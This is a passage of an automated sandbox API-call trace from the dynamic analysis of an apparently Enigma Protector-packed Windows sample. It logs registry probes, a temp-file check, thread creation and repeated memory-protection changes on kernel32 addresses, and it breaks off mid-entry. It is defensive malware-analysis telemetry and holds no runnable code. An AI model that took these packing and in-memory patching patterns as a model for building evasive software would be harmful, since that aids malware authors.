RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.410] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0079.411] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.412] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.413] GetLastError () returned 0x0 [0079.413] SetLastError (dwErrCode=0x0) [0079.413] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.414] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.485] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0079.485] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0079.485] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0079.485] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0079.485] GetLastError () returned 0x0 [0079.485] SetLastError (dwErrCode=0x0) [0079.485] GetLastError () returned 0x0 [0079.486] SetLastError (dwErrCode=0x0) [0079.486] GetLastError () returned 0x0 [0079.486] SetLastError (dwErrCode=0x0) [0079.486] GetLastError () returned 0x0 [0079.486] SetLastError (dwErrCode=0x0) [0079.547] GetLastError () returned 0x0 [0079.547] SetLastError (dwErrCode=0x0) [0079.547] GetLastError () returned 0x0 [0079.548] SetLastError (dwErrCode=0x0) [0079.548] GetLastError () returned 0x0 [0079.548] SetLastError (dwErrCode=0x0) [0079.548] GetLastError () returned 0x0 [0079.548] SetLastError (dwErrCode=0x0) [0079.548] GetLastError () returned 0x0 [0079.548] SetLastError (dwErrCode=0x0) [0079.667] GetLastError () returned 0x0 [0079.667] SetLastError (dwErrCode=0x0) [0079.667] GetLastError () returned 0x0 [0079.667] SetLastError (dwErrCode=0x0) [0079.667] GetLastError () returned 0x0 [0079.667] SetLastError (dwErrCode=0x0) [0079.725] GetLastError () returned 0x0 [0079.725] SetLastError (dwErrCode=0x0) [0079.725] GetLastError () returned 0x0 [0079.725] SetLastError (dwErrCode=0x0) [0079.725] GetLastError () returned 0x0 [0079.725] SetLastError (dwErrCode=0x0) [0079.725] GetLastError () returned 0x0 [0079.726] SetLastError (dwErrCode=0x0) [0079.783] GetLastError () returned 0x0 [0079.783] SetLastError (dwErrCode=0x0) [0079.783] GetLastError () returned 0x0 [0079.783] SetLastError (dwErrCode=0x0) [0079.783] GetLastError () returned 0x0 [0079.783] SetLastError (dwErrCode=0x0) [0079.841] GetLastError () returned 0x0 [0079.841] SetLastError (dwErrCode=0x0) [0079.842] GetLastError () returned 0x0 [0079.842] SetLastError (dwErrCode=0x0) [0079.842] GetLastError () returned 0x0 [0079.842] SetLastError (dwErrCode=0x0) [0079.899] GetLastError () returned 0x0 [0079.899] SetLastError (dwErrCode=0x0) [0079.899] GetLastError () returned 0x0 [0079.899] SetLastError (dwErrCode=0x0) [0079.899] GetLastError () returned 0x0 [0079.900] SetLastError (dwErrCode=0x0) [0079.900] GetLastError () returned 0x0 [0079.900] SetLastError (dwErrCode=0x0) [0079.900] GetLastError () returned 0x0 [0079.900] SetLastError (dwErrCode=0x0) [0079.968] GetLastError () returned 0x0 [0079.968] SetLastError (dwErrCode=0x0) [0079.969] GetLastError () returned 0x0 [0079.969] SetLastError (dwErrCode=0x0) [0079.969] GetLastError () returned 0x0 [0079.969] SetLastError (dwErrCode=0x0) [0079.969] GetLastError () returned 0x0 [0079.969] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.048] SetLastError (dwErrCode=0x0) [0080.048] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0080.048] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0080.048] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0080.048] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0080.048] GetLastError () returned 0x0 [0080.048] SetLastError (dwErrCode=0x0) [0080.127] GetLastError () returned 0x0 [0080.128] SetLastError (dwErrCode=0x0) [0080.128] GetLastError () returned 0x0 [0080.128] SetLastError (dwErrCode=0x0) [0080.284] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x28eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopers§©wð½ã", lpUsedDefaultChar=0x0) returned 25 [0080.285] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fdac | out: phkResult=0x28fdac*=0x0) returned 0x2 [0080.367] GetLastError () returned 0x0 [0080.367] SetLastError (dwErrCode=0x0) [0080.367] GetLastError () returned 0x0 [0080.367] SetLastError (dwErrCode=0x0) [0080.367] GetLastError () returned 0x0 [0080.368] SetLastError (dwErrCode=0x0) [0080.446] GetLastError () returned 0x0 [0080.446] SetLastError (dwErrCode=0x0) [0080.446] GetLastError () returned 0x0 [0080.447] SetLastError (dwErrCode=0x0) [0080.447] GetLastError () returned 0x0 [0080.447] SetLastError (dwErrCode=0x0) [0080.528] GetLastError () returned 0x0 [0080.529] SetLastError (dwErrCode=0x0) [0080.529] GetLastError () returned 0x0 [0080.529] SetLastError (dwErrCode=0x0) [0080.529] GetLastError () returned 0x0 [0080.529] SetLastError (dwErrCode=0x0) [0080.529] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x1e0)) [0080.529] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x1e0)) [0080.530] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="80EB2F5C", cbMultiByte=8, lpWideCharStr=0x28edd8, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆ꜱã(䘨睝Ꞽã(V") returned 8 [0080.531] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x1e0)) [0080.531] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x1e0)) [0080.531] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x1e0)) [0080.531] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fce4 | out: phkResult=0x28fce4*=0x0) returned 0x2 [0080.531] CreateFileW (lpFileName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.532] GetLocalTime (in: lpSystemTime=0x28fd24 | out: lpSystemTime=0x28fd24*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x1e0)) [0080.532] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.609] GetLastError () returned 0x0 [0080.609] SetLastError (dwErrCode=0x0) [0080.609] GetLastError () returned 0x0 [0080.609] SetLastError (dwErrCode=0x0) [0080.659] GetLocalTime (in: lpSystemTime=0x28fe50 | out: lpSystemTime=0x28fe50*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x7, wMilliseconds=0x200)) [0080.659] GetLastError () returned 0x0 [0080.660] SetLastError (dwErrCode=0x0) [0080.719] GetLastError () returned 0x0 [0080.719] SetLastError (dwErrCode=0x0) [0080.719] GetLastError () returned 0x0 [0080.720] SetLastError (dwErrCode=0x0) [0080.720] GetLastError () returned 0x0 [0080.720] SetLastError (dwErrCode=0x0) [0080.720] GetLastError () returned 0x0 [0080.721] SetLastError (dwErrCode=0x0) [0080.784] GetLastError () returned 0x0 [0080.784] SetLastError (dwErrCode=0x0) [0080.784] GetLastError () returned 0x0 [0080.784] SetLastError (dwErrCode=0x0) [0080.784] GetLastError () returned 0x0 [0080.785] SetLastError (dwErrCode=0x0) [0080.785] GetLastError () returned 0x0 [0080.785] SetLastError (dwErrCode=0x0) [0080.834] GetLastError () returned 0x0 [0080.835] SetLastError (dwErrCode=0x0) [0080.835] GetLastError () returned 0x0 [0080.835] SetLastError (dwErrCode=0x0) [0080.835] GetLastError () returned 0x0 [0080.835] SetLastError (dwErrCode=0x0) [0080.835] GetLastError () returned 0x0 [0080.835] SetLastError (dwErrCode=0x0) [0080.884] GetLastError () returned 0x0 [0080.884] SetLastError (dwErrCode=0x0) [0080.884] GetLastError () returned 0x0 [0080.884] SetLastError (dwErrCode=0x0) [0080.884] GetLastError () returned 0x0 [0080.884] SetLastError (dwErrCode=0x0) [0080.884] GetLastError () returned 0x0 [0080.885] SetLastError (dwErrCode=0x0) [0080.885] GetLastError () returned 0x0 [0080.885] SetLastError (dwErrCode=0x0) [0080.937] GetLastError () returned 0x0 [0080.937] SetLastError (dwErrCode=0x0) [0080.937] GetLastError () returned 0x0 [0080.937] SetLastError (dwErrCode=0x0) [0080.937] GetLastError () returned 0x0 [0080.937] SetLastError (dwErrCode=0x0) [0080.986] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x523e84, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x28fe78 | out: lpThreadId=0x28fe78*=0xf5c) returned 0x120 [0080.988] GetLastError () returned 0x0 [0080.988] SetLastError (dwErrCode=0x0) [0080.988] GetLastError () returned 0x0 [0080.989] SetLastError (dwErrCode=0x0) [0080.989] GetLastError () returned 0x0 [0080.989] SetLastError (dwErrCode=0x0) [0080.989] GetLastError () returned 0x0 [0080.989] SetLastError (dwErrCode=0x0) [0081.046] GetLastError () returned 0x0 [0081.047] SetLastError (dwErrCode=0x0) [0081.047] GetLastError () returned 0x0 [0081.047] SetLastError (dwErrCode=0x0) [0081.096] GetLastError () returned 0x0 [0081.096] SetLastError (dwErrCode=0x0) [0081.148] GetLastError () returned 0x0 [0081.148] SetLastError (dwErrCode=0x0) [0081.148] GetLastError () returned 0x0 [0081.149] SetLastError (dwErrCode=0x0) [0081.149] GetLastError () returned 0x0 [0081.149] SetLastError (dwErrCode=0x0) [0081.149] GetLastError () returned 0x0 [0081.149] SetLastError (dwErrCode=0x0) [0081.149] GetLastError () returned 0x0 [0081.149] SetLastError (dwErrCode=0x0) [0081.197] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0081.197] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0081.198] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0081.199] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0081.199] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0081.199] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0081.199] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0081.200] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0081.200] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0081.200] GetLastError () returned 0x0 [0081.201] SetLastError (dwErrCode=0x0) [0081.201] GetLastError () returned 0x0 [0081.201] SetLastError (dwErrCode=0x0) [0081.201] GetLastError () returned 0x0 [0081.201] SetLastError (dwErrCode=0x0) [0081.201] GetCurrentProcessId () returned 0xf34 [0081.201] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf34) returned 0x124 [0081.204] Module32First (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.206] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0081.208] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0081.208] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.209] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0081.209] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0081.221] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40170, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.222] GetCurrentProcess () returned 0xffffffff [0081.222] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40170, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.571] GetCurrentProcess () returned 0xffffffff [0081.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40248, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.572] GetCurrentProcess () returned 0xffffffff [0081.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40248, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.572] GetCurrentProcess () returned 0xffffffff [0081.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4024c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.572] GetCurrentProcess () returned 0xffffffff [0081.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4024c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.572] GetCurrentProcess () returned 0xffffffff [0081.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.574] GetCurrentProcess () returned 0xffffffff [0081.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.574] GetCurrentProcess () returned 0xffffffff [0081.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40264, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.574] GetCurrentProcess () returned 0xffffffff [0081.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40264, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.574] GetCurrentProcess () returned 0xffffffff [0081.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.575] GetCurrentProcess () returned 0xffffffff [0081.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.575] GetCurrentProcess () returned 0xffffffff [0081.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.575] GetCurrentProcess () returned 0xffffffff [0081.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b405bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.576] GetCurrentProcess () returned 0xffffffff [0081.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40640, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.576] GetCurrentProcess () returned 0xffffffff [0081.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40640, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.576] GetCurrentProcess () returned 0xffffffff [0081.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40644, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.577] GetCurrentProcess () returned 0xffffffff [0081.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40644, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.577] GetCurrentProcess () returned 0xffffffff [0081.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40728, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.577] GetCurrentProcess () returned 0xffffffff [0081.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40728, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.578] GetCurrentProcess () returned 0xffffffff [0081.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4072c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.578] GetCurrentProcess () returned 0xffffffff [0081.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4072c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.578] GetCurrentProcess () returned 0xffffffff [0081.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b407e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.579] GetCurrentProcess () returned 0xffffffff [0081.579] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b407e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.579] GetCurrentProcess () returned 0xffffffff [0081.579] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40874, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.579] GetCurrentProcess () returned 0xffffffff [0081.580] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40874, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.580] GetCurrentProcess () returned 0xffffffff [0081.580] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40880, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.580] GetCurrentProcess () returned 0xffffffff [0081.580] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40880, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.580] GetCurrentProcess () returned 0xffffffff [0081.580] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40934, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.581] GetCurrentProcess () returned 0xffffffff [0081.581] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40934, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.581] GetCurrentProcess () returned 0xffffffff [0081.581] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40aac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.582] GetCurrentProcess () returned 0xffffffff [0081.582] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40aac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.582] GetCurrentProcess () returned 0xffffffff [0081.582] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d14, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.582] GetCurrentProcess () returned 0xffffffff [0081.582] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d14, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, 